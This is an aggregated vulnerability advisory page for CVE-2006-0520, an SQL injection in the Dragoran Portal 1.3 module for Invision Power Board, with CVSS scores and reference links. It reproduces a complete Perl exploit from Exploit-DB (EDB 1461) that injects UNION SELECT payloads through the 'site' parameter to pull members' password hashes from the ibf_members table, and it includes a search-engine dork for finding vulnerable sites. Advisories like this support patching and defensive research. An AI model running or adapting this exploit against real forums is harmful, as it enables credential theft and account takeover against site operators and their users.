CVE-2006-0520
CVSS 7.5
Published: 2006-02-02 06:02:00
Last modified: 2011-03-07 21:30:14

[Original] SQL injection vulnerability in index.php in Dragoran Portal module 1.3 for Invision Power Board (IPB) allows remote attackers to execute arbitrary SQL commands via the site parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.


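[CNNVD] Invision Power Board portal plugin index.php SQL injection vulnerability (CNNVD-200602-023)

        A SQL injection vulnerability exists in index.php of the Dragoran Portal module 1.3 for Invision Power Board (IPB). Remote attackers can execute arbitrary SQL commands via the site parameter.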

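- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found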

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0520
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0520
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-023
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/24404
(UNKNOWN)  XF  portal-index-sql-injection(24404)
http://www.vupen.com/english/advisories/2006/0396
(UNKNOWN)  VUPEN  ADV-2006-0396
http://secunia.com/advisories/18664
(VENDOR_ADVISORY)  SECUNIA  18664
http://www.securityfocus.com/bid/16447
(UNKNOWN)  BID  16447
http://www.osvdb.org/22851
(UNKNOWN)  OSVDB  22851

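- Vulnerability information

Invision Power Board portal plugin index.php SQL injection vulnerability
High risk, SQL injection
2006-02-02 00:00:00 2006-02-03 00:00:00
Remote
        A SQL injection vulnerability exists in index.php of the Dragoran Portal module 1.3 for Invision Power Board (IPB). Remote attackers can execute arbitrary SQL commands via the site parameter.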

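- Advisories and patches

        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version.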

- Vulnerability information (1461)

Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit (EDBID:1461)
php webapps
2006-01-31 Verified
0 SkOd
N/A
#!/usr/bin/perl
###########################################
#IPB Portal 1.3->Invision Power Board plugin
#Created By SkOd
#SED security Team , http://sed-team.be
###########################################
#google:
#"Portal 1.3 by Dragoran"
###########################################



use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
#      IPB Portal 1.3 SQL injection Get Hash Exploit       #
#          Tested on Invision Power Board 1.3.0		   #
#	    created By SkOd. SED Security Team             #
############################################################
	ipbpro.pl [HOST] [PATH] [Target id]
	  ipbpro.pl www.host.com /forum/ 2 
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];


$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$path2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";

print "[+]Connecting...\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
print "[+]User ID: $id\n";
print "[+]MD5 Hash: ";
while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Exploit Failed\r\n";
print $socket "GET $path2 HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}

# milw0rm.com [2006-01-31]
		

- Vulnerability information

22851
Invision Power Board Dragoran Portal Module index.php site Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

Invision Power Board Dragoran Portal Module contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'site' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- Timeline

2006-02-01 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
